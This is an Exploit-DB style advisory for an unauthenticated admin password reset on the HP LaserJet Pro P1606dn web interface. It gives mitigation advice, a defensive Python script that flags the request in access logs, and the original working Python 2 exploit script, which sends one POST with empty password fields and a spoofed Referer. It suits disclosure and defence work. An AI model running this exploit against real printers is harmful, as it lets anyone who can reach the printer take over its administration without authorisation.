Vendor/Product: HP LaserJet Pro P1606dn
By: m3tamantra
CVSS: 7.5 (HIGH)
Type: Password Reset
CWE: 287
Product Name: LaserJet Pro P1606dn
Affected Version From: 20100223
Affected Version To: 20100223
Patch Exists: NO
Related CWE: CWE-287 (Improper Authentication)
CPE: h:hp:laserjet_pro_p1606dn
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2013

HP LaserJet Pro P1606dn Webadmin password reset

This exploit resets the administrator password of the HP LaserJet Pro P1606dn embedded web server ("Webadmin"). It sends a single POST to cgi-bin/ip_password_result.htm, the CGI behind the password-change page SSI/Auth/ip_password.htm, with both password fields (the two ID_p+184 values, new password and its confirmation) empty and the submit button value Apply=Übernehmen (German for "Apply", URL-encoded as %C3%9Cbernehmen), so the admin password is set to an empty string. The script sends no credentials, no session cookie and no current password: anyone who can reach TCP/80 on the printer can do this. It adds a Referer header pointing at the printer's own password page and a browser User-Agent so the request looks like an ordinary form submission from the web interface.

Mitigation:

No vendor patch is listed for this firmware. Because the password-change CGI never proves that the caller knows the current password, a stronger admin password does not help; the only effective controls are network ones. Restrict access to the printer's embedded web server (management VLAN or firewall rule for TCP/80 to the printer), disable the web interface if it is not needed, and alert on any POST to /cgi-bin/ip_password_result.htm from a host outside the management network. After an alert, verify that the admin password has not been cleared and set it again.
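The two points above, what the request actually submits and how to spot it, as an added example in Python 3 that is not part of the Exploit-DB entry. It decodes the exploit's form body (copied verbatim from the script) to show the two empty password fields, then scans a constructed combined-format access log, assumed to come from a proxy or sensor in front of the printer, for POSTs to the password CGI. The management network 10.0.0.0/24 and the sample log lines are assumptions for the example. Note that in application/x-www-form-urlencoded data a literal '+' means a space, so the field the browser sent as ID_p+184 decodes to 'ID_p 184'.

```python
# Added example, not part of the Exploit-DB entry: dissect the form body the
# exploit posts and flag the same request in a (constructed) combined-format
# access log from a proxy or sensor in front of the printer.
import ipaddress
import re
from urllib.parse import parse_qsl

# Exact values from the exploit script.
PASSWORD_CGI = "/cgi-bin/ip_password_result.htm"
EXPLOIT_BODY = "ID_p+184=&ID_p+184=&Apply=%C3%9Cbernehmen"

# Assumption: the only network whose hosts may administer the printer.
MANAGEMENT_NETS = [ipaddress.ip_network("10.0.0.0/24")]


def decode_form(body):
    """Decode an application/x-www-form-urlencoded body into (name, value)
    pairs. keep_blank_values=True keeps the empty password fields, which are
    the whole point of the exploit; '+' decodes to a space, so the field the
    browser sent as ID_p+184 comes back as 'ID_p 184'."""
    return parse_qsl(body, keep_blank_values=True, encoding="utf-8")


def is_blank_password_submit(body):
    """True when every field except the submit button is empty, i.e. the
    request asks the firmware to set the admin password to ''."""
    fields = [(k, v) for k, v in decode_form(body) if k != "Apply"]
    return len(fields) >= 2 and all(v == "" for _, v in fields)


# Combined log format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_log_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_management_host(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in MANAGEMENT_NETS)


def find_password_resets(lines):
    """One alert per POST to the password CGI. A POST from outside the
    management networks is 'high'; one from inside is still recorded as
    'low', because the CGI never proved the caller knew the old password."""
    alerts = []
    for line in lines:
        rec = parse_log_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] != PASSWORD_CGI:
            continue
        severity = "low" if is_management_host(rec["ip"]) else "high"
        alerts.append({"ip": rec["ip"], "time": rec["time"],
                       "status": rec["status"], "severity": severity})
    return alerts


# Constructed sample log: an admin changing the password from the management
# network, then the exploit run from an ordinary client (same Referer/UA as
# the script), then unrelated browsing.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/May/2013:09:58:44 +0200] "GET /SSI/Auth/ip_password.htm HTTP/1.1" 200 2110 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [20/May/2013:09:59:02 +0200] "POST /cgi-bin/ip_password_result.htm HTTP/1.1" 200 512 "http://192.168.1.2/SSI/Auth/ip_password.htm" "Mozilla/5.0"',
    '192.168.1.77 - - [20/May/2013:10:12:01 +0200] "POST /cgi-bin/ip_password_result.htm HTTP/1.1" 200 512 "http://192.168.1.2/SSI/Auth/ip_password.htm" "Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1"',
    '192.168.1.77 - - [20/May/2013:10:12:05 +0200] "GET / HTTP/1.1" 200 3300 "-" "curl/7.26.0"',
]

if __name__ == "__main__":
    print("exploit body decodes to:", decode_form(EXPLOIT_BODY))
    print("blank password submit:", is_blank_password_submit(EXPLOIT_BODY))
    for alert in find_password_resets(SAMPLE_LOG):
        print(alert)
```

An access log does not carry the POST body, so the log scan can only say that the password CGI was hit, not that the fields were empty; is_blank_password_submit is for a capture or proxy that records bodies. Treat any hit from outside the management network as a compromise of the web admin until the password has been checked and reset.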

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: HP LaserJet Pro P1606dn Webadmin password reset
# Date: 20.05.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://www8.hp.com/de/de/products/printers/product-detail.html?oid=4110411 
# Firmware Date: 20100223
# Python 2 (urllib2). The request is unchanged from the original; only the
# error handling has been fixed.

import urllib2

ip = '192.168.1.2' # Printer IP

# POST the password-change form with both password fields (ID_p+184: new
# password and confirmation) empty. "Apply=%C3%9Cbernehmen" is the German
# submit-button label "Uebernehmen" as captured from a browser.
req = urllib2.Request('http://'+ip+'/cgi-bin/ip_password_result.htm', data='ID_p+184=&ID_p+184=&Apply=%C3%9Cbernehmen')
# Referer makes the request look like it came from the printer's own password page.
req.add_header('Referer', 'http://'+ip+'/SSI/Auth/ip_password.htm')
req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1')

# urlopen() raises HTTPError for non-2xx responses and URLError when the
# printer is unreachable, so failures must be caught here; the original's
# else-branch was never reached and would have failed on str + int anyway.
try:
    f = urllib2.urlopen(req)
except urllib2.HTTPError as e:
    print 'Exploit fail: HTTP %d' % e.code
except urllib2.URLError as e:
    print 'Exploit fail: %s' % e.reason
else:
    if f.getcode() == 200:
        print 'Password reset successfully\nHave a nice day ;-)'
    else:
        print 'Exploit fail: HTTP %d' % f.getcode()